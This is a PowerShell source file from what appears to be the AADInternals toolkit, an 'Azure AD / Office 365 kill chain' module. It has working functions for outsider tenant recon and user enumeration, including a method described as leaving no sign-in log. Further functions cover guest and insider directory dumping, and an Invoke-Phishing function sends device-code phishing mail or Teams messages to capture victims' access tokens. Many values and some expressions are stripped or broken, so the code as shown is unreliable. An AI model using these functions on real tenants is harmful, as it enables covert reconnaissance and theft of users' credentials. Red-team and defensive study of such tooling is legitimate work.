
# This file contains functions for Azure AD / Office 365 kill chain

# Invokes information gathering as an outsider
# Jun 16th 2020
function Invoke-ReconAsOutsider
    Starts tenant recon of the given domain.
    Starts tenant recon of the given domain. Gets all verified domains of the tenant and extracts information such as their type.
    Also checks whether Desktop SSO (aka Seamless SSO) is enabled for the tenant.
    DNS: Does the DNS record exists?
    MX: Does the MX point to Office 365?
    SPF: Does the SPF contain Exchange Online?
    Type: Federated or Managed
    DMARC: Is the DMARC record configured?
    STS: The FQDN of the federated IdP's (Identity Provider) STS (Security Token Service) server
    RPS: Relaying parties of STS (AD FS)
    .Parameter DomainName
    Any domain name of the Azure AD tenant.
    .Parameter Single
    If the switch is used, doesn't get other domains of the tenant.
    .Parameter GetRelayingParties
    Tries to get relaying parties from STS. Returned if STS is AD FS and idpinitiatedsignon.aspx is enabled.
    Invoke-AADIntReconAsOutsider -Domain | Format-Table
    Tenant brand: Company Ltd
    Tenant name: company
    Tenant id: 05aea22e-32f3-4c35-831b-52735704feb3
    DesktopSSO enabled: False
    ---- --- -- --- ----- ---- --- True True True True Federated True True True True Managed True True True False Managed False False False False Managed
    Invoke-AADIntReconAsOutsider -Domain -GetRelayingParties | Format-Table
    Tenant brand: Company Ltd
    Tenant name: company
    Tenant id: 05aea22e-32f3-4c35-831b-52735704feb3
    DesktopSSO enabled: False
    ---- --- -- --- ----- ---- --- --- True True True True Federated {,} True True True True Managed True True True False Managed False False False False Managed
    Invoke-AADIntReconAsOutsider -UserName | Format-Table
    Tenant brand: Company Ltd
    Tenant name: company
    Tenant id: 05aea22e-32f3-4c35-831b-52735704feb3
    DesktopSSO enabled: False
    CBA enabled: True
    ---- --- -- --- ----- ---- --- True True True True Federated True True True True Managed True True True False Managed False False False False Managed

            $DomainName = $UserName.Split("@")[1]

            Write-Verbose "Checking CBA status."
            $tenantCBA = HasCBA -UserName $UserName
        Write-Verbose "Checking if the domain $DomainName is registered to Azure AD"
        $tenantId =    Get-TenantID -Domain $DomainName
        $tenantName =  ""
        $tenantBrand = ""
        $tenantSSO =   ""
            throw "Domain $DomainName is not registered to Azure AD"

        Write-Verbose "`n*`n* EXAMINING TENANT $tenantId`n*"

        # Don't try to get other domains
            $domains = @($DomainName)
            Write-Verbose "Getting domains.."
            $domains = Get-TenantDomains -Domain $DomainName
            Write-Verbose "Found $($domains.count) domains!"

        # Create an empty list
        $domainInformation = @()

        # Counter

        # Loop through the domains
        foreach($domain in $domains)
            # Define variables
            $exists =      $false
            $hasCloudMX =  $false
            $hasCloudSPF = $false

            Write-Progress -Activity "Getting DNS information" -Status $domain -PercentComplete (($c/$domains.count)*100)

            # Check if this is "the initial" domain
            if([string]::IsNullOrEmpty($tenantName) -and $domain.ToLower() -match "^[^.]*\$")
                $tenantName = $domain.Substring(0,$domain.IndexOf("."))
                Write-Verbose "TENANT NAME: $tenantName"

            # Check whether the domain exists in DNS
            try { $exists = (Resolve-DnsName -Name $Domain -ErrorAction SilentlyContinue -DnsOnly -NoHostsFile -NoIdn).count -gt 0 }  catch{}

                # Check the MX record
                $hasCloudMX = HasCloudMX -Domain $domain

                # Check the SPF record
                $hasCloudSPF = HasCloudSPF -Domain $domain

                # Check the DMARC record
                $hasDMARC = HasDMARC -Domain $domain

            # Check if the tenant has the Desktop SSO (aka Seamless SSO) enabled
            if([string]::IsNullOrEmpty($tenantSSO) -or $tenantSSO -eq $false)
                $tenantSSO = HasDesktopSSO -Domain $domain

            # Get the federation information
            $realmInfo = Get-UserRealmV2 -UserName "nn@$domain"
                $tenantBrand = $realmInfo.FederationBrandName
                Write-Verbose "TENANT BRAND: $tenantBrand"
            if($authUrl = $realmInfo.AuthUrl)
                # Try to read relaying parties
                        $idpUrl = $realmInfo.AuthUrl.Substring(0,$realmInfo.AuthUrl.LastIndexOf("/")+1)
                        $idpUrl += "idpinitiatedsignon.aspx"
                        Write-Verbose "Getting relaying parties for $domain from $idpUrl"
                        [xml]$page = Invoke-RestMethod -Uri $idpUrl -TimeoutSec 3

                        $selectElement = $page.html.body.div.div[2].div.div.div.form.div[1].div[1].select.option
                        $relayingParties = New-Object string[] $selectElement.Count
                        Write-Verbose "Got $relayingParties relaying parties from $idpUrl"
                        for($o = 0; $o -lt $selectElement.Count; $o++)
                            $relayingParties[$o] = $selectElement[$o].'#text'
                    catch{} # Okay
                # Get just the server name
                $authUrl = $authUrl.split("/")[2]

            # Set the return object properties
                "Name" =  $domain
                "DNS" =   $exists
                "MX" =    $hasCloudMX
                "SPF" =   $hasCloudSPF
                "DMARC" = $hasDMARC
                "Type" =  $realmInfo.NameSpaceType
                "STS" =   $authUrl 
                $attributes["RPS"] =   $relayingParties 
            Remove-Variable "relayingParties" -ErrorAction SilentlyContinue
            $domainInformation += New-Object psobject -Property $attributes

        Write-Host "Tenant brand: $tenantBrand"
        Write-Host "Tenant name: $tenantName"
        Write-Host "Tenant id: $tenantId"

        # DesktopSSO status not definitive with a single domain
        if(!$Single -or $tenantSSO -eq $true)
            Write-Host "DesktopSSO enabled: $tenantSSO"

        # CBA status definitive if username was provided
            Write-Host "CBA enabled: $tenantCBA"
        return $domainInformation


# Tests whether the user exists in Azure AD or not
# Jun 16th 2020
function Invoke-UserEnumerationAsOutsider
    Checks whether the given user exists in Azure AD or not. Returns $True or $False or empty.
    Checks whether the given user exists in Azure AD or not. Works also with external users! Supports two enumeration methods: Normal, Login, and Autologon.
    The Normal method seems currently work with all tenants. Previously it required Desktop SSO (aka Seamless SSO) to be enabled for at least one domain.
    The Login method works with any tenant, but enumeration queries will be logged to Azure AD sign-in log as failed login events!
    The Autologon method works with any tenant and enumeration queries are not logged!
    Returns $True or $False if existence can be verified and empty if not.
    .Parameter UserName
    List of User names or email addresses of the users.
    .Parameter External
    Whether the given user name is for external user. Requires also -Domain parater!
    .Parameter Domain
    The initial domain of the given tenant.
    .Parameter Method
    The used enumeration method. One of "Normal","Login","Autologon"
    Invoke-AADIntUserEnumerationAsOutsider -UserName
    UserName Exists
    -------- ------ True
    Invoke-AADIntUserEnumerationAsOutsider -UserName -External -Domain
    UserName Exists
    -------- ------ True
    Invoke-AADIntUserEnumerationAsOutsider -UserName, -Method Autologon
    UserName Exists
    -------- ------ True False
    Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider
    UserName Exists
    -------- ------ True False True False
    Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Login
    UserName Exists
    -------- ------ True False True True False

        [Parameter(ParameterSetName="Normal",  Mandatory=$True,ValueFromPipeline)]
        [Parameter(ParameterSetName="External", Mandatory=$True)]
        foreach($User in $UserName)
            # If the user is external, change to correct format
            if($Method -eq "Normal" -and $External)

            new-object psobject -Property ([ordered]@{"UserName"=$User;"Exists" = $(DoesUserExists -User $User -Method $Method)})

# Invokes information gathering as a guest user
# Jun 16th 2020
function Invoke-ReconAsGuest
    Starts tenant recon of Azure AD tenant. Prompts for tenant.
    Starts tenant recon of Azure AD tenant. Prompts for tenant.
    Retrieves information from Azure AD tenant, such as, the number of Azure AD objects and quota, and the number of domains (both verified and unverified).
    Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache
    PS C:\>$results = Invoke-AADIntReconAsGuest
    PS C:\>$results.allowedActions
    application : {read}
    domain : {read}
    group : {read}
    serviceprincipal : {read}
    tenantdetail : {read}
    user : {read, update}
    serviceaction : {consent}
    Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache
    PS C:\>Get-AADIntAzureTenants
    Id Country Name Domains
    -- ------- ---- -------
    221769d7-0747-467c-a5c1-e387a232c58c FI Firma Oy {,,}
    6e3846ee-e8ca-4609-a3ab-f405cfbd02cd US Company Ltd {,,}
    PS C:\>Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache -Tenant 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
    $results = Invoke-AADIntReconAsGuest
    Tenant brand: Company Ltd
    Tenant name:
    Tenant id: 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
    Azure AD objects: 520/500000
    Domains: 6 (4 verified)
    Non-admin users restricted? True
    Users can register apps? True
    Directory access restricted? False
    Guest access: Normal
    CA policies: 7
    PS C:\>$results.allowedActions
    application : {read}
    domain : {read}
    group : {read}
    serviceprincipal : {read}
    tenantdetail : {read}
    user : {read, update}
    serviceaction : {consent}

        # Choises
        # Get access token from cache
        $AccessToken = Get-AccessTokenFromCache -AccessToken $AccessToken -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c"

        # Get the list of tenants the user has access to
        $tenants = Get-AzureTenants -AccessToken $AccessToken
        $tenantNames = $tenants | select -ExpandProperty Name

        # Prompt for tenant choice if more than one
        if($tenantNames.count -gt 1)
            $options = [System.Management.Automation.Host.ChoiceDescription[]]@()
            for($p=0; $p -lt $tenantNames.count; $p++)
                $options += New-Object System.Management.Automation.Host.ChoiceDescription "&$($choises[$p % $choises.Length]) $($tenantNames[$p])"
            $opt = $host.UI.PromptForChoice("Choose the tenant","Choose the tenant to recon",$options,0)
        $tenantInfo = $tenants[$opt]
        $tenant =     $tenantInfo.Id

        # Get the tenant information
        $tenantInformation = Get-AzureInformation -Tenant $tenant

        # Guest access
            $tenantInformation.guestAccess = "unknown"

        # Print out some relevant information
        Write-Host "Tenant brand: $($tenantInformation.displayName)"
        Write-Host "Tenant name: $($ | where isInitial -eq "True" | select -ExpandProperty id)"
        Write-Host "Tenant id: $($tenantInformation.objectId)"
        Write-Host "Azure AD objects: $($tenantInformation.directorySizeQuota.used)/$($"
        Write-Host "Domains: $($ ($(($ | where isVerified -eq "True").Count) verified)"
        Write-Host "Non-admin users restricted? $($tenantInformation.restrictNonAdminUsers)"
        Write-Host "Users can register apps? $($tenantInformation.usersCanRegisterApps)"
        Write-Host "Directory access restricted? $($tenantInformation.restrictDirectoryAccess)"
        Write-Host "Guest access: $($tenantInformation.guestAccess)"
        Write-Host "CA policies: $($tenantInformation.conditionalAccessPolicy.Count)" 

        # Return
        return $tenantInformation


# Starts crawling the organisation for user names and groups
# Jun 16th 2020
function Invoke-UserEnumerationAsGuest
    Crawls the target organisation for user names and groups.
    Crawls the target organisation for user names, groups, and roles. The starting point is the signed-in user, a given username, or a group id.
    The crawl can be controlled with switches. Group members are limited to 1000 entries per group.
    Groups: Include user's groups
    GroupMembers: Include members of user's groups
    Roles: Include roles of user and group members. Can be very time consuming!
    Manager: Include user's manager
    Subordinates: Include user's subordinates (direct reports)
    UserName: User principal name (UPN) of the user to search.
    GroupId: Id of the group. If this is given, only the members of the group are included.
    $results = Invoke-AADIntUserEnumerationAsGuest -UserName
    Tenant brand: Company Ltd
    Tenant name:
    Tenant id: 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
    Logged in as:
    Users: 5
    Groups: 2
    Roles: 0

        # Choises
        # Get access token from cache
        $AccessToken = Get-AccessTokenFromCache -AccessToken $AccessToken -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c"

        # Get the list of tenants the user has access to
        Write-Verbose "Getting list of user's tenants.."
        $tenants = Get-AzureTenants -AccessToken $AccessToken
        $tenantNames = $tenants | select -ExpandProperty Name

        # Prompt for tenant choice if more than one
        if($tenantNames.count -gt 1)
            $options = [System.Management.Automation.Host.ChoiceDescription[]]@()
            for($p=0; $p -lt $tenantNames.count; $p++)
                $options += New-Object System.Management.Automation.Host.ChoiceDescription "&$($choises[$p % $choises.Length]) $($tenantNames[$p])"
            $opt = $host.UI.PromptForChoice("Choose the tenant","Choose the tenant to recon",$options,0)
        $tenantInfo = $tenants[$opt]
        $tenant =     $tenantInfo.Id

        # Create a new AccessToken for
        $refresh_token = $script:refresh_tokens["d3590ed6-52b3-4102-aeff-aad2292ab01c-"]
            throw "No refresh token found! Use Get-AADIntAccessTokenForAzureCoreManagement with -SaveToCache switch"
        $AccessToken = Get-AccessTokenWithRefreshToken -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c" -TenantId $tenant -RefreshToken $refresh_token -SaveToCache $true

        # Get the initial domain
        $domains = Get-MSGraphDomains -AccessToken $AccessToken
        $tenantDomain = $domains | where isInitial -eq "True" | select -ExpandProperty id
            Throw "No initial domain found for the tenant $tenant!"
        Write-Verbose "Tenant $Tenant / $tenantDomain selected."


        # If GroupID is given, dump only the members of that group
            # Create users object

            # Get group members
            $members = Get-MSGraphGroupMembers -AccessToken $AccessToken -GroupId $GroupId

            # Create a variable for members
            $itemMembers = @()

            # Loop trough the members
            foreach($member in $members)
                $ht_users[$member.Id] = $member
                $itemMembers += $member.userPrincipalName

            # If user name not given, try to get one from the access token
                $UserName = (Read-Accesstoken -AccessToken $AccessToken).upn

                # If upn not found, this is probably user, so use email instead of upn
                    $UserName = (Read-Accesstoken -AccessToken $AccessToken).email

                if(-not ($UserName -like "*#EXT#*"))
                    # As this must be an extrernal user, convert to external format
                    $UserName = "$($UserName.Replace("@","_"))#EXT#@$tenantDomain"

            Write-Verbose "Getting user information for user $UserName"

            # Get the user information
            $user = Get-MSGraphUser -UserPrincipalName $UserName -AccessToken $AccessToken 

                throw "User $UserName not found!"

            # Create the users object
                $ = $user

            # Create the groups object

            # Create the roles object

            Write-Verbose "User found: $($ ($($user.userPrincipalName))"

            # Loop through the user's subordinates
                # Copy the keys as the hashtable may change
                $so_keys = New-Object string[] $ht_users.Count

                # Loop through the users
                foreach($userId in $so_keys)
                    $user = $ht_users[$userId].userPrincipalName
                    Write-Verbose "Getting subordinates of $user"

                    # Get user's subordinates
                    $userSubordinates = Get-MSGraphUserDirectReports -AccessToken $AccessToken -UserPrincipalName $user

                    # Loop trough the users
                    foreach($subordinate in $userSubordinates)
                        $ht_users[$subordinate.Id] = $subordinate

            # Get user's manager
                try{$userManager= Get-MSGraphUserManager -AccessToken $AccessToken -UserPrincipalName $UserName}catch{}
                    $ht_users[$] = $userManager

            # Loop through the users' groups
            if($Groups -or $GroupMembers)
                foreach($userId in $ht_users.Keys)
                    $groupUser = $ht_users[$userId].userPrincipalName
                    Write-Verbose "Getting groups of $groupUser"

                    # Get user's groups
                    $userGroups = Get-MSGraphUserMemberOf -AccessToken $AccessToken -UserPrincipalName $groupUser

                    # Loop trough the groups
                    foreach($group in $userGroups)
                        # This is a normal group
                        if($group.'@odata.type' -eq "")
                            $ht_groups[$] = $group
                            #$itemGroups += $


            # Loop through the group members
                foreach($groupId in $ht_groups.Keys)
                    Write-Verbose "Getting groups of $groupUser"

                    # Get group members
                    $members = Get-MSGraphGroupMembers -AccessToken $AccessToken -GroupId $groupId

                    # Create a variable for members
                    $itemMembers = @()

                    # Loop trough the members
                    foreach($member in $members)
                        $ht_users[$member.Id] = $member
                        $itemMembers += $member.userPrincipalName

                    # Add members to the group
                    $ht_groups[$groupId] | Add-Member -NotePropertyName "members" -NotePropertyValue $itemMembers

                    # Get group owners
                    $owners = Get-MSGraphGroupOwners -AccessToken $AccessToken -GroupId $groupId

                    # Create a variable for members
                    $itemOwners = @()

                    # Loop trough the members
                    foreach($owner in $owners)
                        $ht_users[$owner.Id] = $owner
                        $itemOwners += $owner.userPrincipalName

                    # Add members to the group
                    $ht_groups[$groupId] | Add-Member -NotePropertyName "owners" -NotePropertyValue $itemOwners

            # Loop through the users' roles
                foreach($userId in $ht_users.Keys)
                    $roleUser = $ht_users[$userId].userPrincipalName
                    Write-Verbose "Getting roles of $roleUser"

                    # Get user's roles
                    $userRoles = Get-MSGraphUserMemberOf -AccessToken $AccessToken -UserPrincipalName $roleUser

                    # Loop trough the groups
                    foreach($userRole in $userRoles)
                        if($userRole.'@odata.type' -eq "#microsoft.graph.directoryRole")
                            # Try to get the existing role first
                            $role = $ht_roles[$]
                                # Add a new member to the role
                                # Create a members attribute
                                $userRole | Add-Member -NotePropertyName "members" -NotePropertyValue @($ht_users[$userId].userPrincipalName)
                                $role = $userRole

                            $ht_roles[$] = $role


            # Loop through the role members
                foreach($roleId in $ht_roles.Keys)
                    $members = $null
                    Write-Verbose "Getting role members for '$($ht_roles[$roleId].displayName)'"

                    # Try to get role members, usually fails
                    try{$members = Get-MSGraphRoleMembers -AccessToken $AccessToken -RoleId $roleId}catch{ }

                        # Create a variable for members
                        $itemMembers = @()

                        # Loop trough the members
                        foreach($member in $members)
                            $ht_users[$member.Id] = $member
                            $itemMembers += $member.userPrincipalName

                        # Add members to the role
                        $ht_roles[$roleId] | Add-Member -NotePropertyName "members" -NotePropertyValue $itemMembers -Force

        # Print out some relevant information
        Write-Host "Tenant brand: $($tenantInfo.Name)"
        Write-Host "Tenant name: $tenantDomain"
        Write-Host "Tenant id: $($"
        Write-Host "Logged in as: $((Read-Accesstoken -AccessToken $AccessToken).unique_name)"
        Write-Host "Users: $($ht_users.count)"
        Write-Host "Groups: $($ht_groups.count)"
        Write-Host "Roles: $($ht_roles.count)"

        # Create the return value
            "Users" =  $ht_users.values
            "Groups" = $ht_groups.Values
            "Roles" =  $ht_roles.Values
        return New-Object psobject -Property $attributes

# Invokes information gathering as an internal user
# Aug 4th 2020
function Invoke-ReconAsInsider
    Starts tenant recon of Azure AD tenant.
    Starts tenant recon of Azure AD tenant.
    PS C:\>$results = Invoke-AADIntReconAsInsider
    Tenant brand: Company Ltd
    Tenant name:
    Tenant id: 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
    Azure AD objects: 520/500000
    Domains: 6 (4 verified)
    Non-admin users restricted? True
    Users can register apps? True
    Directory access restricted? False
    Directory sync enabled? true
    Global admins: 3
    CA policies: 8
    MS Partner IDs:
    MS Partner DAP enabled? False
    MS Partner contracts: 0
    MS Partners: 1
    PS C:\>$results.roleInformation | Where Members -ne $null | select Name,Members
    Name Members
    ---- -------
    Company Administrator {@{DisplayName=MOD Administrator;}, @{D...
    User Account Administrator @{DisplayName=User Admin;}
    Directory Readers {@{DisplayName=Microsoft.Azure.SyncFabric; UserPrincipalName=}, @{DisplayName=MicrosoftAzur...
    Directory Synchronization Accounts {@{DisplayName=On-Premises Directory Synchronization Service Account; UserPrincipalName=Syn...

        # Get access token from cache
        $AccessToken = Get-AccessTokenFromCache -AccessToken $AccessToken -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c"
        # Get the refreshtoken from the cache and create AAD token
        $tenantId = (Read-Accesstoken $AccessToken).tid
        $refresh_token = $script:refresh_tokens["d3590ed6-52b3-4102-aeff-aad2292ab01c-"]
        $AAD_AccessToken       = Get-AccessTokenWithRefreshToken -RefreshToken $refresh_token -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c" -TenantId $tenantId
        $MSPartner_AccessToken = Get-AccessTokenWithRefreshToken -RefreshToken $refresh_token -Resource "fa3d9a0c-3fb0-42cc-9193-47c7ecd2edbd" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c" -TenantId $tenantId
        $AdminAPI_AccessToken  = Get-AccessTokenWithRefreshToken -RefreshToken $refresh_token -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c" -TenantId $tenantId

        # Get the tenant information
        Write-Verbose "Getting company information"
        $companyInformation = Get-CompanyInformation -AccessToken $AAD_AccessToken

        # Get the sharepoint information
        Write-Verbose "Getting SharePoint Online information"
        $sharePointInformation = Get-SPOServiceInformation -AccessToken $AAD_AccessToken

        # Get the admins
        Write-Verbose "Getting role information"
        $roles = Get-Roles -AccessToken $AAD_AccessToken
        $sortedRoles = $roles.Role | Sort -Property Name
        foreach($role in $roles.Role)
            Write-Verbose "Getting members of role ""$($role.Name)"""
            $attributes["Name"] = $role.Name
            $attributes["IsEnabled"] = $role.IsEnabled
            $attributes["IsSystem"] = $role.IsSystem
            $attributes["ObjectId"] = $role.ObjectId
            $members = Get-RoleMembers -AccessToken $AAD_AccessToken -RoleObjectId $role.ObjectId | select @{N='DisplayName'; E={$_.DisplayName}},@{N='UserPrincipalName'; E={$_.EmailAddress}}

            $attributes["Members"] = $members

            $roleInformation += New-Object psobject -Property $attributes

        # Get the tenant information
        Write-Verbose "Getting tenant information"
        $tenantInformation = Get-AzureInformation -Tenant $tenantId

        # Get basic partner information
        Write-Verbose "Getting basic partner information"
        $partnerInformation = Get-PartnerInformation -AccessToken $AAD_AccessToken

        # Get partner organisation information
        Write-Verbose "Getting partner organisation information"
        $partnerOrganisations = @(Get-MSPartnerOrganizations -AccessToken $MSPartner_AccessToken)

        # Get partner role information
        Write-Verbose "Getting partner role information"
        $partnerRoleInformation = @(Get-MSPartnerRoleMembers -AccessToken $MSPartner_AccessToken)

        # Get partner contracts (customers)
        Write-Verbose "Getting partner contracts (customers)"
            $partnerContracts = @(Get-MSPartnerContracts -AccessToken $AAD_AccessToken)
            # Okay, not all are partner organisations :)

        # Get partners
        Write-Verbose "Getting partners"
            $partners = @(Get-MSPartners -AccessToken $AdminAPI_AccessToken)
            # Okay

        # Set the extra tenant information
        $tenantInformation |Add-Member -NotePropertyName "companyInformation"     -NotePropertyValue $companyInformation
        $tenantInformation |Add-Member -NotePropertyName "SPOInformation"         -NotePropertyValue $sharePointInformation
        $tenantInformation |Add-Member -NotePropertyName "roleInformation"        -NotePropertyValue $roleInformation
        $tenantInformation |Add-Member -NotePropertyName "partnerDAPEnabled"      -NotePropertyValue ($partnerInformation.DapEnabled -eq "true")
        $tenantInformation |Add-Member -NotePropertyName "partnerType"            -NotePropertyValue $partnerInformation.CompanyType
        $tenantInformation |Add-Member -NotePropertyName "partnerContracts"       -NotePropertyValue $partnerContracts
        $tenantInformation |Add-Member -NotePropertyName "partnerOrganisations"   -NotePropertyValue $partnerOrganisations
        $tenantInformation |Add-Member -NotePropertyName "partners"               -NotePropertyValue $partners
        $tenantInformation |Add-Member -NotePropertyName "partnerRoleInformation" -NotePropertyValue $partnerRoleInformation

        # Print out some relevant information
        Write-Host "Tenant brand: $($tenantInformation.displayName)"
        Write-Host "Tenant name: $($ | where isInitial -eq "True" | select -ExpandProperty id)"
        Write-Host "Tenant id: $tenantId"
        Write-Host "Azure AD objects: $($tenantInformation.directorySizeQuota.used)/$($"
        Write-Host "Domains: $($ ($(($ | where isVerified -eq "True").Count) verified)"
        Write-Host "Non-admin users restricted? $($tenantInformation.restrictNonAdminUsers)"
        Write-Host "Users can register apps? $($tenantInformation.usersCanRegisterApps)"
        Write-Host "Directory access restricted? $($tenantInformation.restrictDirectoryAccess)"
        Write-Host "Directory sync enabled? $($tenantInformation.companyInformation.DirectorySynchronizationEnabled)"
        Write-Host "Global admins: $(@($tenantInformation.roleInformation | Where-Object ObjectId -eq "62e90394-69f5-4237-9190-012177145e10" | Select-Object -ExpandProperty Members).Count)" 
        Write-Host "CA policies: $($tenantInformation.conditionalAccessPolicy.Count)" 
        Write-Host "MS Partner IDs: $(($tenantInformation.partnerOrganisations | where typeName -Like "Partner*" ).MPNID -join ",")"             
        Write-Host "MS Partner DAP enabled? $($tenantInformation.partnerDAPEnabled)"
        Write-Host "MS Partner contracts: $($tenantInformation.partnerContracts.Count)"             
        Write-Host "MS Partners: $($"

        # Return
        return $tenantInformation


# Starts crawling the organisation for user names and groups
# Jun 16th 2020
function Invoke-UserEnumerationAsInsider
    Dumps user names and groups of the tenant.
    Dumps user names and groups of the tenant.
    By default, the first 1000 users and groups are returned.
    Groups: Include groups
    GroupMembers: Include members of the groups (not recommended)
    GroupId: Id of the group. If this is given, only one group and members are included.
    C:\PS>$results = Invoke-AADIntUserEnumerationAsInsider
    Users: 5542
    Groups: 212
    id : 7ab0eb51-b7cb-4ff0-84ec-893a413d7b4a
    displayName : User Demo
    userPrincipalName :
    onPremisesImmutableId : UQ989+t6fEq9/0ogYtt1pA==
    onPremisesLastSyncDateTime : 2020-07-14T08:18:47Z
    onPremisesSamAccountName : UserD
    onPremisesSecurityIdentifier : S-1-5-21-854168551-3279074086-2022502410-1104
    refreshTokensValidFromDateTime : 2019-07-14T08:21:35Z
    signInSessionsValidFromDateTime : 2019-07-14T08:21:35Z
    proxyAddresses : {,}
    businessPhones : {+1234567890}
    identities : {@{signInType=userPrincipalName;;}}

        [int] $MaxResults=1000,
        [switch] $Groups,
        [switch] $GroupMembers,
        # Get access token from cache
        $AccessToken = Get-AccessTokenFromCache -AccessToken $AccessToken -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c"

         # Create a new AccessToken for
        $refresh_token = $script:refresh_tokens["d3590ed6-52b3-4102-aeff-aad2292ab01c-"]
            throw "No refresh token found! Use Get-AADIntAccessTokenForAzureCoreManagement with -SaveToCache switch"
        # MSGraph Access Token
        $AccessToken = Get-AccessTokenWithRefreshToken -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c" -TenantId (Read-Accesstoken $AccessToken).tid -RefreshToken $refresh_token -SaveToCache $true

        # Get the users and some relevant information
            $users = Call-MSGraphAPI -MaxResults $MaxResults -AccessToken $AccessToken -API "users" -ApiVersion "v1.0" -QueryString "`$select=id,displayName,userPrincipalName,userType,onPremisesImmutableId,onPremisesLastSyncDateTime,onPremisesSamAccountName,onPremisesSecurityIdentifier,onPremisesDistinguishedName,refreshTokensValidFromDateTime,signInSessionsValidFromDateTime,proxyAddresses,businessPhones,identities"

        # Get the groups
        if($Groups -or $GroupMembers -or $GroupId)
            $groupQS = ""
            if($GroupMembers -or $GroupId)
            $groupResults = Call-MSGraphAPI -MaxResults $MaxResults -AccessToken $AccessToken -API $groupsAPI -ApiVersion "v1.0" -QueryString $groupQS
            "Users" =  $users
            "Groups" = $groupResults

        # Print out some relevant information
        Write-Host "Users: $($Users.count)"
        Write-Host "Groups: $(if($GroupId -and $groupResults -ne $null){1}else{$groupResults.count})"

        # Return
        New-Object psobject -Property $attributes

# Sends phishing email to given recipients
# Oct 13th 2020
function Invoke-Phishing
    Sends phishing mail to given recipients and receives user's access token
    Sends phishing mail to given recipients and receives user's access token using device code authentication flow.
    .Parameter Tenant
    Tenant id of tenant used for authentication. Defaults to "Common"
    .Parameter Tenant
    Tenant id of tenant used for authentication. Defaults to "Common"
    .Parameter Recipients
    Comma separated list of recipient emails
    .Parameter Subject
    Subject of the email
    .Parameter Sender
    Sender of the email. Supports the plain email "" and display name "Some User <" formats
    .Parameter SMTPServer
    Ip address or FQDN of the SMTP server used to send the email
    .Parameter SMTPCredentials
    Credentials used to authenticate to SMTP server
    .Parameter Message
    An html message to be sent to recipients. Uses string formatting to insert url and user code.
    {0} = user code
    {1} = signing url
    Default message:
    '<div>Hi!<br/>This is a message sent to you by someone who is using <a href="">AADInternals</a> phishing function. <br/><br/>Here is a <a href="{1}">link</a> you <b>should not click</b>.<br/><br/>If you still decide to do so, provide the following code when requested: <b>{0}</b>.</div>'
    .Parameter CleanMessage
    An html message used to replace the original Teams message after the access token has been received.
    Default message:
    '<div>Hi!<br/>This is a message sent to you by someone who is using <a href="">AADInternals</a> phishing function. <br/>If you are seeing this, <b>someone has stolen your identity!</b>.</div>'
    .Parameter Teams
    Switch indicating that Teams is used for sending phishing messages.
    $tokens = Invoke-AADIntPhishing -Recipients -Subject "Johnny shared a document with you" -Sender "Johnny Carson <>" -SMTPServer smtp.myserver.local
    Code: CKDZ2BURF
    Mail sent to:
    Received access token for
    $tokens = Invoke-AADIntPhishing -Recipients "","" -Subject "Johnny shared a document with you" -Sender "Johnny Carson <>" -SMTPServer smtp.myserver.local -SaveToCache
    Code: CKDZ2BURF
    Mail sent to:
    Mail sent to:
    Received access token for
    PS C:\>$results = Invoke-AADIntReconAsInsider
    Tenant brand:
    Tenant name:
    Tenant id: d4e225d6-8877-4bc6-b68c-52c44011ba81
    Azure AD objects: 147960/300000
    Domains: 5 (5 verified)
    Non-admin users restricted? True
    Users can register apps? True
    Directory access restricted? False
    Directory sync enabled? true
    Global admins 10
    PS C:\>Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache
    PS C:\>$tokens = Invoke-AADPhishing -Recipients "" -Teams
    Code: CKDZ2BURF
    Teams message sent to: Message id: 132473151989090816
    Received access token for

        [String]$Message='<div>Hi!<br/>This is a message sent to you by someone who is using <a href="">AADInternals</a> phishing function. <br/><br/>Here is a <a href="{1}">link</a> you <b>should not click</b>.<br/><br/>If you still decide to do so, provide the following code when requested: <b>{0}</b>.</div>',

        [String]$CleanMessage='<div>Hi!<br/>This is a message sent to you by someone who is using <a href="">AADInternals</a> phishing function. <br/>If you are seeing this, <b>someone has stolen your identity!</b>.</div>',


        # Choises
            # Get access token from cache
            $AccessToken = Get-AccessTokenFromCache -AccessToken $AccessToken -Resource "" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c"

            # If external, use the target tenant id
                $Tenant = Get-AADIntTenantID -UserName $Recipients[0]

            # Get the list of tenants the user has access to if not provided
                $tenants = Get-AzureTenants -AccessToken $AccessToken
                $tenantNames = $tenants | select -ExpandProperty Name

                # Prompt for tenant choice if more than one
                if($tenantNames.count -gt 1)
                    $options = [System.Management.Automation.Host.ChoiceDescription[]]@()
                    for($p=0; $p -lt $tenantNames.count; $p++)
                        $options += New-Object System.Management.Automation.Host.ChoiceDescription "&$($choises[$p % $choises.Length]) $($tenantNames[$p])"
                    $opt = $host.UI.PromptForChoice("Choose the tenant","Choose the tenant to sent messages to",$options,0)
                $tenantInfo = $tenants[$opt]
                $tenant =     $tenantInfo.Id

            # Create a new AccessToken for
            $refresh_token = $script:refresh_tokens["d3590ed6-52b3-4102-aeff-aad2292ab01c-"]
                throw "No refresh token found! Use Get-AADIntAccessTokenForAzureCoreManagement with -SaveToCache switch"
            $AccessToken = Get-AccessTokenWithRefreshToken -Resource "" -ClientId "1fec8e78-bce4-4aaf-ab1b-5451cc387264" -TenantId (Read-AccessToken -AccessToken $AccessToken).tid -RefreshToken $refresh_token -SaveToCache $true

        # Create a body for the first request. We'll be using client id of "Microsoft Office"
        $clientId = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
